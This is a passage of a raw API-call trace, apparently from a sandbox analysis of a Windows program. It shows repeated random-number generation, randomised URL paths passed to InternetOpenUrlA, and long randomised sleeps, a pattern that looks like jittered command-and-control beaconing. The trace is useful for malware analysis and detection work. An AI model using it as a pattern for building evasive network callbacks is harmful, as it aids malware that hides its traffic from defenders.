GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.680] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.680] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.680] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.680] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.681] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.681] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.681] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.681] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.681] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.681] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.681] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.681] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.681] GetProcessHeap () returned 0x440000 [0240.682] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4724e0 [0240.682] lstrcpyA (in: lpString1=0x4724e0, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0240.682] lstrcatA (in: lpString1="\x81\x03", lpString2="/3nzsd0foxituvM2Ithv3a2LyrdqZ1UpLB684moqx3/fi7hm0zqlf7o7da0745n4b3st71/8zaojmq0gIeuwyLunJfY6nbegwi0AplxFrd/bxoupS06cjqhjuiKv/RqGgfC7g7mwogcubaqad0i/" | out: lpString1="\x81\x03/3nzsd0foxituvM2Ithv3a2LyrdqZ1UpLB684moqx3/fi7hm0zqlf7o7da0745n4b3st71/8zaojmq0gIeuwyLunJfY6nbegwi0AplxFrd/bxoupS06cjqhjuiKv/RqGgfC7g7mwogcubaqad0i/") returned="\x81\x03/3nzsd0foxituvM2Ithv3a2LyrdqZ1UpLB684moqx3/fi7hm0zqlf7o7da0745n4b3st71/8zaojmq0gIeuwyLunJfY6nbegwi0AplxFrd/bxoupS06cjqhjuiKv/RqGgfC7g7mwogcubaqad0i/" [0240.682] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0240.682] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/3nzsd0foxituvM2Ithv3a2LyrdqZ1UpLB684moqx3/fi7hm0zqlf7o7da0745n4b3st71/8zaojmq0gIeuwyLunJfY6nbegwi0AplxFrd/bxoupS06cjqhjuiKv/RqGgfC7g7mwogcubaqad0i/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0240.682] GetProcessHeap () returned 0x440000 [0240.682] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4724e0 | out: hHeap=0x440000) returned 1 [0240.682] GetProcessHeap () returned 0x440000 [0240.682] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a01c50 | out: hHeap=0x440000) returned 1 [0240.682] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0240.682] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0240.683] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0240.683] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0240.683] Sleep (dwMilliseconds=0x125b1) [0240.938] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0240.938] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0240.938] GetProcessHeap () returned 0x440000 [0240.938] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0240.939] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.939] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0240.939] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.939] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x15, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0240.940] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.940] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.940] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.940] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.941] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.941] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.941] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.941] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.941] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.941] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.941] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.941] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.942] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.942] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.942] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.943] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.943] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.943] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0240.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b266, cbBuffer=0x17, dwFlags=0x2 | out: pbBuffer=0x3a1b266) returned 0x0 [0240.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.946] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.946] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.946] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.947] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.947] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.947] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.948] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.948] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.949] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.949] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.949] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.949] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.949] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.950] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.950] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.950] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.951] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.951] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.951] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.952] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.952] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.952] GetProcessHeap () returned 0x440000 [0240.952] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4741c0 [0240.952] lstrcpyA (in: lpString1=0x4741c0, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0240.952] lstrcatA (in: lpString1="\x04", lpString2="/1q6gpFsiln5v0nzdsp67/oevb8uqn7ghpev0Jum2nph/" | out: lpString1="\x04/1q6gpFsiln5v0nzdsp67/oevb8uqn7ghpev0Jum2nph/") returned="\x04/1q6gpFsiln5v0nzdsp67/oevb8uqn7ghpev0Jum2nph/" [0240.952] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0240.953] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/1q6gpFsiln5v0nzdsp67/oevb8uqn7ghpev0Jum2nph/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0240.953] GetProcessHeap () returned 0x440000 [0240.953] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4741c0 | out: hHeap=0x440000) returned 1 [0240.953] GetProcessHeap () returned 0x440000 [0240.953] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0240.953] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0240.953] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0240.953] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0240.954] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0240.954] Sleep (dwMilliseconds=0x15815) [0241.185] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.185] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0241.185] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.185] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0241.185] GetProcessHeap () returned 0x440000 [0241.185] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a17480 [0241.186] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.186] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0241.186] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.186] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17481, cbBuffer=0x18, dwFlags=0x2 | out: pbBuffer=0x3a17481) returned 0x0 [0241.186] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.186] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.187] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.187] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.187] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.187] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.187] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.187] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.187] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.188] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.188] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.188] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.188] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.188] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.189] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.189] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.189] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.189] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.189] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.189] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.189] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.190] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.190] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.190] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.191] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.191] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.192] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0241.192] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17499, cbBuffer=0x14, dwFlags=0x2 | out: pbBuffer=0x3a17499) returned 0x0 [0241.192] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.192] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0241.462] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.464] GetProcAddress 